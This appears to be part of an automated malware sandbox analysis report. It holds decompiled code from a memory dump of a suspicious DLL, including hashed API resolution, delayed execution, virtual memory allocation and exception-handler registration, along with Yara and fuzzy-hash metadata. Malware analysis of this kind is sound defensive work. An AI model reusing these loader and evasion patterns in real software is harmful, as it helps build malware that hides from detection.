                                                                                                                                      				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v156, E7322F568(_t361) + 0x10);
                                                                                                                                      				E7322F558( &_v160, E7322F568( &_v160) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v168 = _v168 + 1;
                                                                                                                                      				_t365 =  &_v164;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v164, E7322F568(_t365) + 0x10);
                                                                                                                                      				E7322F558( &_v168, E7322F568( &_v168) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v176 = _v176 + 1;
                                                                                                                                      				_t369 =  &_v172;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v172, E7322F568(_t369) + 0x10);
                                                                                                                                      				E7322F558( &_v176, E7322F568( &_v176) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v184 = _v184 + 1;
                                                                                                                                      				_t373 =  &_v180;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v180, E7322F568(_t373) + 0x10);
                                                                                                                                      				E7322F558( &_v184, E7322F568( &_v184) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v192 = _v192 + 1;
                                                                                                                                      				_t377 =  &_v188;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v188, E7322F568(_t377) + 0x10);
                                                                                                                                      				E7322F558( &_v192, E7322F568( &_v192) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v200 = _v200 + 1;
                                                                                                                                      				_t381 =  &_v196;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v196, E7322F568(_t381) + 0x10);
                                                                                                                                      				E7322F558( &_v200, E7322F568( &_v200) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v208 = _v208 + 1;
                                                                                                                                      				_t385 =  &_v204;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v204, E7322F568(_t385) + 0x10);
                                                                                                                                      				E7322F558( &_v208, E7322F568( &_v208) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_t434 = _t480;
                                                                                                                                      				 *_t434 =  *_t434 + 1;
                                                                                                                                      				E7323413C(0xa5eabdf8, _t434);
                                                                                                                                      				E7322F558( &_v212, 0x10);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x450], xmm0");
                                                                                                                                      				E7322F558( &_v216, 0x20);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x458], xmm0");
                                                                                                                                      				E7322F558( &_v220, 0x30);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x460], xmm0");
                                                                                                                                      				E7322F558( &_v224, 0x40);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x468], xmm0");
                                                                                                                                      				E7322F558( &_v228, 0x50);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x470], xmm0");
                                                                                                                                      				E7322F558( &_v232, 0x60);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x478], xmm0");
                                                                                                                                      				E7322F558( &_v236, 0x70);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x480], xmm0");
                                                                                                                                      				E7322F558( &_v240, 0x80);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x488], xmm0");
                                                                                                                                      				E7322F558( &_v244, 0x90);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x490], xmm0");
                                                                                                                                      				E7322F558( &_v248, 0xa0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x498], xmm0");
                                                                                                                                      				E7322F558( &_v252, 0xb0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4a0], xmm0");
                                                                                                                                      				E7322F558( &_v256, 0xc0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4a8], xmm0");
                                                                                                                                      				E7322F558( &_v260, 0xd0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4b0], xmm0");
                                                                                                                                      				E7322F558( &_v264, 0xe0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4b8], xmm0");
                                                                                                                                      				E7322F558( &_v268, 0xf0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4c0], xmm0");
                                                                                                                                      				E7322F558( &_v272, 0x100);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4c8], xmm0");
                                                                                                                                      				_t282 = E7322F558( &_v276, 0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [esp], xmm0");
                                                                                                                                      				_v252 = E73221D2C(_v248, _t434, _t481, _t282, _t282);
                                                                                                                                      				_t318 = _t434;
                                                                                                                                      				E7322B338( &_v248, _v256, _t481, _v252, _t318);
                                                                                                                                      				E7322F8DC( &_v296, _t481);
                                                                                                                                      				_v300 = 0;
                                                                                                                                      				_t410 =  &_v296;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v296, E7322F568(_t410) + 0x10);
                                                                                                                                      				E7322F558( &_v300, E7322F568( &_v300) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v308 = _v308 + 1;
                                                                                                                                      				_t414 =  &_v304;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v304, E7322F568(_t414) + 0x10);
                                                                                                                                      				E7322F558( &_v308, E7322F568( &_v308) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v316 = _v316 + 1;
                                                                                                                                      				_t418 =  &_v312;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v312, E7322F568(_t418) + 0x10);
                                                                                                                                      				E7322F558( &_v316, E7322F568( &_v316) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				_v324 = _v324 + 1;
                                                                                                                                      				_t422 =  &_v320;
                                                                                                                                      				asm("pxor xmm0, xmm0");
                                                                                                                                      				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
                                                                                                                                      				asm("movq [ecx+0x18], xmm0");
                                                                                                                                      				E7322F8C4( &_v320, E7322F568(_t422) + 0x10);
                                                                                                                                      				E7322F558( &_v324, E7322F568( &_v324) + 0xfffffff0);
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				asm("movsd");
                                                                                                                                      				 *_t480 =  *_t480 + 1;
                                                                                                                                      				_t310 = _t480;
                                                                                                                                      				_push(_t310);
                                                                                                                                      				_push(_t318);
                                                                                                                                      				_push(_v292);
                                                                                                                                      				_t154 = _t310 + 0x2c; // 0x2c
                                                                                                                                      				E7322BAB8(_t154,  *_t480);
                                                                                                                                      				E7322F558( &_v340, 0);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4d8], xmm0"); // executed
                                                                                                                                      				E7322F558( &_v344, 0x10); // executed
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4e0], xmm0");
                                                                                                                                      				E7322F558( &_v348, "true");
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4d0], xmm0");
                                                                                                                                      				E7322F558( &_v352, 0x30);
                                                                                                                                      				asm("movq xmm0, [eax+0x8]");
                                                                                                                                      				asm("movq [ebp+0x4e8], xmm0");
                                                                                                                                      				E7322F6F0( &_v316);
                                                                                                                                      				return E7322F6F0( &_v356);
                                                                                                                                      			}
















































































                                                                                                                                      0x73221494
                                                                                                                                      0x73221498
                                                                                                                                      0x7322149d
                                                                                                                                      0x732214a3
                                                                                                                                      0x732214ab
                                                                                                                                      0x732214b0
                                                                                                                                      0x732214bc
                                                                                                                                      0x732214c0
                                                                                                                                      0x732214d2
                                                                                                                                      0x732214e8
                                                                                                                                      0x732214f3
                                                                                                                                      0x732214f4
                                                                                                                                      0x732214f5
                                                                                                                                      0x732214f6
                                                                                                                                      0x732214f7
                                                                                                                                      0x732214fa
                                                                                                                                      0x732214fe
                                                                                                                                      0x73221502
                                                                                                                                      0x73221509
                                                                                                                                      0x7322151b
                                                                                                                                      0x73221531
                                                                                                                                      0x7322153c
                                                                                                                                      0x7322153d
                                                                                                                                      0x7322153e
                                                                                                                                      0x7322153f
                                                                                                                                      0x73221540
                                                                                                                                      0x73221543
                                                                                                                                      0x73221547
                                                                                                                                      0x7322154b
                                                                                                                                      0x73221552
                                                                                                                                      0x73221564
                                                                                                                                      0x7322157a
                                                                                                                                      0x73221585
                                                                                                                                      0x73221586
                                                                                                                                      0x73221587
                                                                                                                                      0x73221588
                                                                                                                                      0x73221589
                                                                                                                                      0x7322158c
                                                                                                                                      0x73221590
                                                                                                                                      0x73221594
                                                                                                                                      0x7322159b
                                                                                                                                      0x732215ad
                                                                                                                                      0x732215c3
                                                                                                                                      0x732215ce
                                                                                                                                      0x732215cf
                                                                                                                                      0x732215d0
                                                                                                                                      0x732215d1
                                                                                                                                      0x732215d2
                                                                                                                                      0x732215d5
                                                                                                                                      0x732215d9
                                                                                                                                      0x732215dd
                                                                                                                                      0x732215e4
                                                                                                                                      0x732215f6
                                                                                                                                      0x7322160c
                                                                                                                                      0x73221617
                                                                                                                                      0x73221618
                                                                                                                                      0x73221619
                                                                                                                                      0x7322161a
                                                                                                                                      0x7322161b
                                                                                                                                      0x7322161e
                                                                                                                                      0x73221622
                                                                                                                                      0x73221626
                                                                                                                                      0x7322162d
                                                                                                                                      0x7322163f
                                                                                                                                      0x73221655
                                                                                                                                      0x73221660
                                                                                                                                      0x73221661
                                                                                                                                      0x73221662
                                                                                                                                      0x73221663
                                                                                                                                      0x73221664
                                                                                                                                      0x73221667
                                                                                                                                      0x7322166b
                                                                                                                                      0x7322166f
                                                                                                                                      0x73221676
                                                                                                                                      0x73221688
                                                                                                                                      0x7322169e
                                                                                                                                      0x732216a9
                                                                                                                                      0x732216aa
                                                                                                                                      0x732216ab
                                                                                                                                      0x732216ac
                                                                                                                                      0x732216ad
                                                                                                                                      0x732216b0
                                                                                                                                      0x732216b4
                                                                                                                                      0x732216b8
                                                                                                                                      0x732216bf
                                                                                                                                      0x732216d1
                                                                                                                                      0x732216e7
                                                                                                                                      0x732216f2
                                                                                                                                      0x732216f3
                                                                                                                                      0x732216f4
                                                                                                                                      0x732216f5
                                                                                                                                      0x732216f6
                                                                                                                                      0x732216f9
                                                                                                                                      0x732216fd
                                                                                                                                      0x73221701
                                                                                                                                      0x73221708
                                                                                                                                      0x7322171a
                                                                                                                                      0x73221730
                                                                                                                                      0x7322173b
                                                                                                                                      0x7322173c
                                                                                                                                      0x7322173d
                                                                                                                                      0x7322173e
                                                                                                                                      0x7322173f
                                                                                                                                      0x73221742
                                                                                                                                      0x73221746
                                                                                                                                      0x7322174a
                                                                                                                                      0x73221751
                                                                                                                                      0x73221763
                                                                                                                                      0x73221779
                                                                                                                                      0x73221784
                                                                                                                                      0x73221785
                                                                                                                                      0x73221786
                                                                                                                                      0x73221787
                                                                                                                                      0x73221788
                                                                                                                                      0x7322178b
                                                                                                                                      0x7322178f
                                                                                                                                      0x73221793
                                                                                                                                      0x7322179a
                                                                                                                                      0x732217ac
                                                                                                                                      0x732217c2
                                                                                                                                      0x732217cd
                                                                                                                                      0x732217ce
                                                                                                                                      0x732217cf
                                                                                                                                      0x732217d0
                                                                                                                                      0x732217d1
                                                                                                                                      0x732217d4
                                                                                                                                      0x732217d8
                                                                                                                                      0x732217dc
                                                                                                                                      0x732217e3
                                                                                                                                      0x732217f5
                                                                                                                                      0x7322180b
                                                                                                                                      0x73221816
                                                                                                                                      0x73221817
                                                                                                                                      0x73221818
                                                                                                                                      0x73221819
                                                                                                                                      0x7322181a
                                                                                                                                      0x7322181d
                                                                                                                                      0x73221821
                                                                                                                                      0x73221825
                                                                                                                                      0x7322182c
                                                                                                                                      0x7322183e
                                                                                                                                      0x73221854
                                                                                                                                      0x7322185f
                                                                                                                                      0x73221860
                                                                                                                                      0x73221861
                                                                                                                                      0x73221862
                                                                                                                                      0x73221863
                                                                                                                                      0x73221866
                                                                                                                                      0x7322186a
                                                                                                                                      0x7322186e
                                                                                                                                      0x73221875
                                                                                                                                      0x73221887
                                                                                                                                      0x7322189d
                                                                                                                                      0x732218a8
                                                                                                                                      0x732218a9
                                                                                                                                      0x732218aa
                                                                                                                                      0x732218ab
                                                                                                                                      0x732218ac
                                                                                                                                      0x732218af
                                                                                                                                      0x732218b3
                                                                                                                                      0x732218b7
                                                                                                                                      0x732218be
                                                                                                                                      0x732218d0
                                                                                                                                      0x732218e6
                                                                                                                                      0x732218f1
                                                                                                                                      0x732218f2
                                                                                                                                      0x732218f3
                                                                                                                                      0x732218f4
                                                                                                                                      0x732218f5
                                                                                                                                      0x732218f8
                                                                                                                                      0x732218fc
                                                                                                                                      0x73221900
                                                                                                                                      0x73221907
                                                                                                                                      0x73221919
                                                                                                                                      0x7322192f
                                                                                                                                      0x7322193a
                                                                                                                                      0x7322193b
                                                                                                                                      0x7322193c
                                                                                                                                      0x7322193d
                                                                                                                                      0x7322193e
                                                                                                                                      0x73221941
                                                                                                                                      0x73221945
                                                                                                                                      0x73221949
                                                                                                                                      0x73221950
                                                                                                                                      0x73221962
                                                                                                                                      0x73221978
                                                                                                                                      0x73221983
                                                                                                                                      0x73221984
                                                                                                                                      0x73221985
                                                                                                                                      0x73221986
                                                                                                                                      0x7322198c
                                                                                                                                      0x7322198f
                                                                                                                                      0x73221991
                                                                                                                                      0x7322199c
                                                                                                                                      0x732219a3
                                                                                                                                      0x732219ac
                                                                                                                                      0x732219b4
                                                                                                                                      0x732219bb
                                                                                                                                      0x732219c4
                                                                                                                                      0x732219cc
                                                                                                                                      0x732219d3
                                                                                                                                      0x732219dc
                                                                                                                                      0x732219e4
                                                                                                                                      0x732219eb
                                                                                                                                      0x732219f4
                                                                                                                                      0x732219fc
                                                                                                                                      0x73221a03
                                                                                                                                      0x73221a0c
                                                                                                                                      0x73221a14
                                                                                                                                      0x73221a1b
                                                                                                                                      0x73221a24
                                                                                                                                      0x73221a2c
                                                                                                                                      0x73221a36
                                                                                                                                      0x73221a3f
                                                                                                                                      0x73221a47
                                                                                                                                      0x73221a51
                                                                                                                                      0x73221a5a
                                                                                                                                      0x73221a62
                                                                                                                                      0x73221a6c
                                                                                                                                      0x73221a75
                                                                                                                                      0x73221a7d
                                                                                                                                      0x73221a87
                                                                                                                                      0x73221a90
                                                                                                                                      0x73221a98
                                                                                                                                      0x73221aa2
                                                                                                                                      0x73221aab
                                                                                                                                      0x73221ab3
                                                                                                                                      0x73221abd
                                                                                                                                      0x73221ac6
                                                                                                                                      0x73221ace
                                                                                                                                      0x73221ad8
                                                                                                                                      0x73221ae1
                                                                                                                                      0x73221ae9
                                                                                                                                      0x73221af3
                                                                                                                                      0x73221afc
                                                                                                                                      0x73221b04
                                                                                                                                      0x73221b0e
                                                                                                                                      0x73221b17
                                                                                                                                      0x73221b1f
                                                                                                                                      0x73221b26
                                                                                                                                      0x73221b2f
                                                                                                                                      0x73221b37
                                                                                                                                      0x73221b3e
                                                                                                                                      0x73221b43
                                                                                                                                      0x73221b51
                                                                                                                                      0x73221b55
                                                                                                                                      0x73221b64
                                                                                                                                      0x73221b6d
                                                                                                                                      0x73221b72
                                                                                                                                      0x73221b79
                                                                                                                                      0x73221b7d
                                                                                                                                      0x73221b81
                                                                                                                                      0x73221b88
                                                                                                                                      0x73221b9a
                                                                                                                                      0x73221bb0
                                                                                                                                      0x73221bbb
                                                                                                                                      0x73221bbc
                                                                                                                                      0x73221bbd
                                                                                                                                      0x73221bbe
                                                                                                                                      0x73221bbf
                                                                                                                                      0x73221bc2
                                                                                                                                      0x73221bc6
                                                                                                                                      0x73221bca
                                                                                                                                      0x73221bd1
                                                                                                                                      0x73221be3
                                                                                                                                      0x73221bf9
                                                                                                                                      0x73221c04
                                                                                                                                      0x73221c05
                                                                                                                                      0x73221c06
                                                                                                                                      0x73221c07
                                                                                                                                      0x73221c08
                                                                                                                                      0x73221c0b
                                                                                                                                      0x73221c0f
                                                                                                                                      0x73221c13
                                                                                                                                      0x73221c1a
                                                                                                                                      0x73221c2c
                                                                                                                                      0x73221c42
                                                                                                                                      0x73221c4d
                                                                                                                                      0x73221c4e
                                                                                                                                      0x73221c4f
                                                                                                                                      0x73221c50
                                                                                                                                      0x73221c51
                                                                                                                                      0x73221c54
                                                                                                                                      0x73221c58
                                                                                                                                      0x73221c5c
                                                                                                                                      0x73221c63
                                                                                                                                      0x73221c75
                                                                                                                                      0x73221c8b
                                                                                                                                      0x73221c96
                                                                                                                                      0x73221c97
                                                                                                                                      0x73221c98
                                                                                                                                      0x73221c99
                                                                                                                                      0x73221c9a
                                                                                                                                      0x73221c9d
                                                                                                                                      0x73221ca0
                                                                                                                                      0x73221ca1
                                                                                                                                      0x73221ca2
                                                                                                                                      0x73221ca9
                                                                                                                                      0x73221cac
                                                                                                                                      0x73221cb7
                                                                                                                                      0x73221cbe
                                                                                                                                      0x73221cc7
                                                                                                                                      0x73221ccf
                                                                                                                                      0x73221cd6
                                                                                                                                      0x73221cdf
                                                                                                                                      0x73221ce7
                                                                                                                                      0x73221cee
                                                                                                                                      0x73221cf7
                                                                                                                                      0x73221cff
                                                                                                                                      0x73221d04
                                                                                                                                      0x73221d0d
                                                                                                                                      0x73221d15
                                                                                                                                      0x73221d2a

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $#,
                                                                                                                                      • API String ID: 0-2557146312
                                                                                                                                      • Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
                                                                                                                                      • Instruction ID: 4191827dd46945e73edddbcbc365ece843642a9219d3cdc40c1af69530aeb60d
                                                                                                                                      • Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
                                                                                                                                      • Instruction Fuzzy Hash: 7A328272405705AFD705DF20CC50B9FBBB0AFA2206F11471DB4992A1A1FFB1EADACA51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                      			E7323218C(void* __ecx, intOrPtr __edx, void* __esi) {
                                                                                                                                      				intOrPtr _v4;
                                                                                                                                      				intOrPtr _v20;
                                                                                                                                      				intOrPtr* _t5;
                                                                                                                                      				intOrPtr _t11;
                                                                                                                                      				intOrPtr* _t13;
                                                                                                                                      				intOrPtr* _t15;
                                                                                                                                      
                                                                                                                                      				_t11 = __edx;
                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                      					 *_t15 = 0;
                                                                                                                                      					_v4 = 0;
                                                                                                                                      				} else {
                                                                                                                                      					 *_t15 = E73233A34(0xffffd8f0, 0xffffffff, __ecx, 0);
                                                                                                                                      					_v20 = _t11;
                                                                                                                                      				}
                                                                                                                                      				_t5 = E73232F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
                                                                                                                                      				_t13 = _t5;
                                                                                                                                      				if(_t13 != 0) {
                                                                                                                                      					_t5 =  *_t13(0, _t15); // executed
                                                                                                                                      				}
                                                                                                                                      				return _t5;
                                                                                                                                      			}









                                                                                                                                      0x7323218c
                                                                                                                                      0x73232190
                                                                                                                                      0x732321ac
                                                                                                                                      0x732321af
                                                                                                                                      0x73232192
                                                                                                                                      0x732321a1
                                                                                                                                      0x732321a4
                                                                                                                                      0x732321a4
                                                                                                                                      0x732321bf
                                                                                                                                      0x732321c4
                                                                                                                                      0x732321c8
                                                                                                                                      0x732321d0
                                                                                                                                      0x732321d0
                                                                                                                                      0x732321d4

                                                                                                                                      APIs
                                                                                                                                      • NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,732235C3,00000000,00000000,?), ref: 732321D0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DelayExecution
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1249177460-0
                                                                                                                                      • Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
                                                                                                                                      • Instruction ID: b9379c2ac465ff180bc6457a3f51bc08d86b1ec1d1415cdcf9a316c43b44d111
                                                                                                                                      • Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
                                                                                                                                      • Instruction Fuzzy Hash: 7AE09BF010E3416EFB4497288E00B3B7AE89F81611FA0851DB595E62C4E670D4804722
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E73232790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
                                                                                                                                      				long _v4;
                                                                                                                                      				void* _t8;
                                                                                                                                      				long _t10;
                                                                                                                                      				PVOID* _t19;
                                                                                                                                      
                                                                                                                                      				_v4 = __edx;
                                                                                                                                      				 *_t19 = __ecx;
                                                                                                                                      				if(E73232F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
                                                                                                                                      					L3:
                                                                                                                                      					_t8 =  *_t19;
                                                                                                                                      				} else {
                                                                                                                                      					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
                                                                                                                                      					if(_t10 == 0) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						_t8 = 0;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				return _t8;
                                                                                                                                      			}







                                                                                                                                      0x73232797
                                                                                                                                      0x732327a0
                                                                                                                                      0x732327ae
                                                                                                                                      0x732327d1
                                                                                                                                      0x732327d1
                                                                                                                                      0x732327b0
                                                                                                                                      0x732327c7
                                                                                                                                      0x732327cb
                                                                                                                                      0x00000000
                                                                                                                                      0x732327cd
                                                                                                                                      0x732327cd
                                                                                                                                      0x732327cd
                                                                                                                                      0x732327cb
                                                                                                                                      0x732327d6

                                                                                                                                      APIs
                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,73238852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 732327C7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2167126740-0
                                                                                                                                      • Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
                                                                                                                                      • Instruction ID: eb74b5b6dee0a23155fd279b873a2118cff8f36ecc87ff20d120f9bbad461d81
                                                                                                                                      • Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
                                                                                                                                      • Instruction Fuzzy Hash: 56E039B120D746AFEB09CA24CC14F6BBBF9EF89600F548C1EB496C6590E770D8809722
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 37%
                                                                                                                                      			E73233060(intOrPtr* __ecx) {
                                                                                                                                      				void* _t1;
                                                                                                                                      
                                                                                                                                      				_push(E732333D8);
                                                                                                                                      				_push(1); // executed
                                                                                                                                      				_t1 =  *__ecx(); // executed
                                                                                                                                      				return _t1;
                                                                                                                                      			}




                                                                                                                                      0x73233060
                                                                                                                                      0x73233065
                                                                                                                                      0x73233067
                                                                                                                                      0x73233069

                                                                                                                                      APIs
                                                                                                                                      • RtlAddVectoredExceptionHandler.NTDLL(00000001,732333D8,73233050,A5EABDF8,A5EABDF8,?,73222530,00000001), ref: 73233067
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, Offset: 73220000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.495992673.0000000073220000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496245350.000000007323A000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496331831.000000007323D000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000002.00000002.496415452.000000007323F000.00000002.00020000.sdmp Download File
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionHandlerVectored
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3310709589-0
